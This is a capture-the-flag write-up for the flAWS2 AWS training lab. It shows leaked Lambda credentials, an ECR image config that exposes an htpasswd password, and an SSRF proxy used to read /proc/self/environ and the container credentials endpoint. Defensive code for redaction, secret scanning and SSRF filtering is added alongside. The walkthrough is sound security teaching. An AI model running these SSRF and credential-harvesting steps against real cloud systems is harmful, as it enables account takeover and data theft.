flAWS2 is a capture-the-flag (CTF) that teaches security problems specific to AWS.

There is also a flaws1. Link -> http://flaws.cloud/
flaws2 link -> http://level1.flaws2.cloud/

Level 1

We can see that we have to submit a PIN code. But if we send a letter instead, an error is generated: https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=ric

Error, malformed input
{"PATH":"/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin","LD_LIBRARY_PATH":"/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib","LANG":"en_US.UTF-8","TZ":":UTC","LAMBDA_TASK_ROOT":"/var/task","LAMBDA_RUNTIME_DIR":"/var/runtime","AWS_REGION":"us-east-1","AWS_DEFAULT_REGION":"us-east-1","AWS_LAMBDA_LOG_GROUP_NAME":"/aws/lambda/level1","AWS_LAMBDA_LOG_STREAM_NAME":"2020/08/24/[$LATEST]f39bf3e6c113465bb71c43a071f38cc2","AWS_LAMBDA_FUNCTION_NAME":"level1","AWS_LAMBDA_FUNCTION_MEMORY_SIZE":"128","AWS_LAMBDA_FUNCTION_VERSION":"$LATEST","_AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2","_AWS_XRAY_DAEMON_PORT":"2000","AWS_XRAY_DAEMON_ADDRESS":"169.254.79.2:2000","AWS_XRAY_CONTEXT_MISSING":"LOG_ERROR","_X_AMZN_TRACE_ID":"Root=1-5f439812-cca2f5da7bd5dd16fde308b4;Parent=454d243e41d0ec9a;Sampled=0","AWS_EXECUTION_ENV":"AWS_Lambda_nodejs8.10","_HANDLER":"index.handler","NODE_PATH":"/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules","AWS_ACCESS_KEY_ID":"ASIAZQNB3KHGIZTRFUZB","AWS_SECRET_ACCESS_KEY":"KQA7UGPrHdiqN20vNhuesyXKZnSIkx4SUnw2MfAg","AWS_SESSION_TOKEN":"..."}

That error dumps the function's environment variables, which include credentials for someone. Let's check:

kali% aws --profile f2l1 sts get-caller-identity
{
    "UserId": "AROAIBATWWYQXZTTALNCE:level1",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
}

kali% aws s3 ls s3://level1.flaws2.cloud --profile f2l1
                           PRE img/
2018-11-20 15:55:05      17102 favicon.ico
2018-11-20 21:00:22       1905 hint1.htm
2018-11-20 21:00:22       2226 hint2.htm
2018-11-20 21:00:22       2536 hint3.htm
2018-11-20 21:00:23       2460 hint4.htm
2018-11-20 21:00:17       3000 index.htm
2018-11-20 21:00:17       1899 secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html
kali% 

We use that information to move on to level 2.
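
The failure mode behind level 1, next to a corrected form. This is an added example, not the flAWS2 function's source and not part of the original write-up; the handler names, the event shape and the sample environment are assumptions.

```javascript
// Hypothetical handlers (added example, not the flAWS2 function's source).
// Both accept an API Gateway-style event with a ?code= query parameter.

// Vulnerable pattern: malformed input returns the whole environment, which
// on Lambda carries the execution role's temporary credentials.
function vulnerableHandler(event, env) {
  const code = (event.queryStringParameters || {}).code || "";
  if (!/^\d+$/.test(code)) {
    return { statusCode: 500,
             body: "Error, malformed input\n" + JSON.stringify(env) };
  }
  return { statusCode: 200, body: "code checked" };
}

// Variable names that must never leave the function, in a response or a log.
const SECRET_NAME = /KEY|SECRET|TOKEN|PASSWORD/i;

function redactEnv(env) {
  const out = {};
  for (const [name, value] of Object.entries(env)) {
    out[name] = SECRET_NAME.test(name) ? "[redacted]" : value;
  }
  return out;
}

// Hardened pattern: the caller gets a fixed 400; diagnostics go to the log
// sink only (console.error by default), and are redacted before logging.
function hardenedHandler(event, env, log = console.error) {
  const code = (event.queryStringParameters || {}).code || "";
  if (!/^\d+$/.test(code)) {
    log(JSON.stringify({ error: "malformed code", env: redactEnv(env) }));
    return { statusCode: 400, body: "Error, malformed input" };
  }
  return { statusCode: 200, body: "code checked" };
}

// Constructed sample environment; the values are placeholders.
const SAMPLE_ENV = {
  AWS_REGION: "us-east-1",
  AWS_ACCESS_KEY_ID: "EXAMPLE-KEY-ID",
  AWS_SECRET_ACCESS_KEY: "EXAMPLE-SECRET",
  AWS_SESSION_TOKEN: "EXAMPLE-TOKEN",
};
```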

Level 2

This level has a container at http://container.target.flaws2.cloud/

kali% aws --profile f2l1 sts get-caller-identity         
{
    "UserId": "AROAIBATWWYQXZTTALNCE:level1",
    "Account": "653711331788",
    "Arn": "arn:aws:sts::653711331788:assumed-role/level1/level1"
}

kali% aws ecr list-images --repository-name level2 --registry-id 653711331788 --profile f2l1 --region us-east-1
{
    "imageIds": [
        {
            "imageDigest": "sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e",
            "imageTag": "latest"
        }
    ]
}

kali% aws --profile f2l1 --region us-east-1 ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' 
{
  "schemaVersion": 2,
  "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
  "config": {
    "mediaType": "application/vnd.docker.container.image.v1+json",
    "size": 5359,
    "digest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
  },
  "layers": [
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 43412182,
      "digest": "sha256:7b8b6451c85f072fd0d7961c97be3fe6e2f772657d471254f6d52ad9f158a580"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 848,
      "digest": "sha256:ab4d1096d9ba178819a3f71f17add95285b393e96d08c8a6bfc3446355bcdc49"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 619,
      "digest": "sha256:e6797d1788acd741d33f4530106586ffee568be513d47e6e20a4c9bc3858822e"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 168,
      "digest": "sha256:e25c5c290bded5267364aa9f59a18dd22a8b776d7658a41ffabbf691d8104e36"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 32516034,
      "digest": "sha256:96af0e137711cf1b2bf6e95528fbf861b2beef58c382bdadcf8062851e7005bb"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 217,
      "digest": "sha256:2057ef5841b5bc57c66088d7d99898e6b7a516feaf2e66a7a4c69e6b40a03472"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 619,
      "digest": "sha256:e4206c7b02ec71b1262ad18216e1203da19e5292fcf636392e0ed969871bb235"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 893,
      "digest": "sha256:501f2d39ea313392ab1e2b4b6b7d9213c60335d3c508fc02b3bdae9792ae2d32"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 508,
      "digest": "sha256:f90fb73d877d9ce2e2220a1340d2e347b0c7baa2d120ce02c8731d666cdb1cac"
    },
    {
      "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
      "size": 213,
      "digest": "sha256:4fbdfdaee9ae20c6e877bd57838c6f93336573195f4aafcdec36fb4c4358a935"
    }
  ]
}

Let's download the config file:

kali% aws --profile f2l1 --region us-east-1 ecr get-download-url-for-layer --repository-name level2 --registry-id 653711331788 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621" 
{
    "downloadUrl": "https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/c814-653711331788-58b3a0a8-1806-5777-1315-c2d788e36c12/1e964f10-a061-4e7b-9290-4447e821fe9a?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEL3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEmHzGThulZsW3EE5SbDMU2GRLyUBec%2FqiKBUIMSqR%2B5AiA1Y3Tif4xtBiUOns8s%2BVE0I2TCd5eXzvAUkc6uNybU9CreAgil%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAEaDDU5MTEwNTkxNDk1MiIMbRnuFEtYLe%2B7BdOiKrIC3PTaZrMRSm9lktOhlNeDN0VRKBH2BvUBjy0ISvHmmYpYgP1qLWbHVEMzjtO2srjylTekfq86DLT%2Bl%2FZgLzdBBI7D56VJiCQ9%2FreXuzHp%2BvkSQCrk2ia2lgpKUZNEc6QDkdHkSvlQ8rnLbM5PjHFAvzI2Gygzl8guuaRAzVfZzUSUAAMr4vrO0JN637nGMlHi6mkW4yaSBtQyYnJuu1lPm6mcoE1ayzB6%2Fdkj5S9vedet4kt6gMMxbEJC8yXI14GquvmFC2QUZaJKgq6fMzBsfpERtjqmQFQffJPSetLOA53xW2Q%2Fn14UKTfP3u%2FrNynsriw8QBzeMnLJ7Fv9y6H2%2BzF01EPE9i1ql5qkjX6v0UrdsTtwxs1cpx4nSpfyTGuB5iw59VpONrRXx%2B6hhgWtxWkyMKDgjvoFOugBtIJjeUzRSGq1lveztZ5gImtoWg%2B4%2BAqxLnGFE1O3tkfTlOXlw4vSZe4GBbXiY0jUMLpfTYX1wjZZIKXvVuDCpC7XQVIKqHCd5FjN4P6XGYy4cHE3tdDdtNJFDui18t%2Byz3M8JcJKH3iMraWiGR9hBR%2FPaLyvqvpGrC%2FJ%2Be3VOYjIxRl0nWauJlG%2BqnDrg5ydl5zBD7yoQXBYjObJdOYjeal1wqAIEiVZ0ppY%2FWp9tgRhG325py22qYwVxIMbaQPZPICreD4q%2BK3i5ezGAUXQuqnA8%2FjjwFLi6kdsfVzW%2FpIwaj3W3E1n%2BA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20200824T123523Z&X-Amz-SignedHeaders=host&X-Amz-Expires=3600&X-Amz-Credential=ASIAYTIFIPBEHRNST7OT%2F20200824%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=0007e150616c90b28e4ff9bd8f04fd90d11537889900cdfc3dbc120b3c4db13d",
    "layerDigest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621"
}
kali% wget https://prod-us-east-1-starport-layer-bucket.s3.us-east-1.amazonaws.com/c814-653711331788-58b3a0a8-1806-57....

The config file contains this line:

:"/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password"}

Which gives us access to the next level.
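
A check that catches this class of leak before an image is pushed: it walks the build history and environment stored in an image config file and reports commands that carry a secret as an argument. This is an added example, not part of the original write-up; the rule list is an assumption, and the sample config is constructed around the one history line quoted above.

```javascript
// Patterns that place a secret in image metadata (illustrative rule set).
const RULES = [
  // htpasswd in batch mode takes the password on the command line
  { id: "htpasswd-batch", re: /\bhtpasswd\s+(?:-\w+\s+)*?-\w*b\w*(?:\s|$)/ },
  { id: "password-flag", re: /--password[= ]\S+/i },
  { id: "secret-assignment", re: /\b\w*(?:PASSWORD|SECRET|TOKEN)\w*=\S+/i },
  { id: "aws-access-key-id", re: /\b(?:AKIA|ASIA)[A-Z0-9]{16}\b/ },
];

// Returns [{ where, rule }] without echoing the matched secret itself.
function scanImageConfig(config) {
  const findings = [];
  const check = (where, text) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) findings.push({ where, rule: rule.id });
    }
  };
  (config.history || []).forEach((h, i) =>
    check(`history[${i}].created_by`, h.created_by || ""));
  ((config.config || {}).Env || []).forEach((e, i) =>
    check(`config.Env[${i}]`, e));
  return findings;
}

// Constructed sample: only the htpasswd line comes from the write-up.
const SAMPLE_CONFIG = {
  config: {
    Env: ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
  },
  history: [
    { created_by: "/bin/sh -c apt-get update && apt-get install -y nginx" },
    { created_by: "/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password" },
    { created_by: '/bin/sh -c #(nop)  CMD ["nginx"]', empty_layer: true },
  ],
};
```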

Level 3

It is a proxy like the one in flaws1, but this one is locked down. We can still read local files, though, such as http://container.target.flaws2.cloud/proxy/file:///proc/self/environ:

HOSTNAME=ip-172-31-56-11.ec2.internalHOME=/rootAWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/9c3439c4-b560-4aac-aa62-f904a24a34e6AWS_EXECUTION_ENV=AWS_ECS_FARGATEAWS_DEFAULT_REGION=us-east-1ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/c88043c3-94ac-4650-a13f-1c15293a5a31PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binAWS_REGION=us-east-1PWD=/

That tells us where the credentials are: http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/9c3439c4-b560-4aac-aa62-f904a24a34e6

{"RoleArn":"arn:aws:iam::653711331788:role/level3","AccessKeyId":"ASIAZQNB3KHGFFPXQZUH","SecretAccessKey":"SstHcaG4DLq0Oy60dHeidpapo6/ZF1L6H+DOeKVd","Token":"...","Expiration":"2020-08-24T18:31:37Z"}

From there we can get into S3:

aws --profile f2l3 --region us-east-1 s3 ls
2018-11-20 19:50:08 flaws2.cloud
2018-11-20 18:45:26 level1.flaws2.cloud
2018-11-21 01:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
2018-11-26 19:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
2018-11-27 20:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
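
The destination check the level 3 proxy was missing, covering both requests shown above (a file:// URL and the link-local credentials endpoint). This is an added example, not the flAWS2 proxy's source; the function names, the injected resolve interface and the sample name table are assumptions.

```javascript
// Ranges a URL-fetching proxy must never connect to: [network, prefix length].
const BLOCKED_V4 = [
  ["0.0.0.0", 8], ["127.0.0.0", 8],                         // this host
  ["169.254.0.0", 16],  // link-local: 169.254.170.2 serves task credentials
  ["10.0.0.0", 8], ["172.16.0.0", 12], ["192.168.0.0", 16], // private
];

function ipv4ToInt(ip) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(ip);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((x) => x > 255)) return null;
  return ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
}

function isBlocked(ip) {
  const n = ipv4ToInt(ip);
  if (n === null) return true; // not a plain IPv4 address: fail closed
  return BLOCKED_V4.some(([net, len]) => {
    const mask = (~0 << (32 - len)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
  });
}

// resolve(hostname) returns the IPv4 addresses the proxy would connect to.
// It is injected (hypothetical interface) so the check also covers names
// that point at internal addresses; the proxy must then connect to the
// checked address rather than resolving the name a second time.
function checkProxyTarget(rawUrl, resolve) {
  let url;
  try { url = new URL(rawUrl); } catch (e) {
    return { ok: false, reason: "unparseable" };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { ok: false, reason: "scheme" };
  }
  const addrs = resolve(url.hostname);
  if (addrs.length === 0) return { ok: false, reason: "unresolved" };
  if (addrs.some(isBlocked)) return { ok: false, reason: "blocked-address" };
  return { ok: true, addrs };
}

// Constructed name table standing in for DNS so the example runs offline.
const SAMPLE_DNS = { "public.example": ["93.184.216.34"],
                     "rebind.example": ["169.254.170.2"] };
const sampleResolve = (host) =>
  ipv4ToInt(host) !== null ? [host] : (SAMPLE_DNS[host] || []);
```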

And that's the end 🙂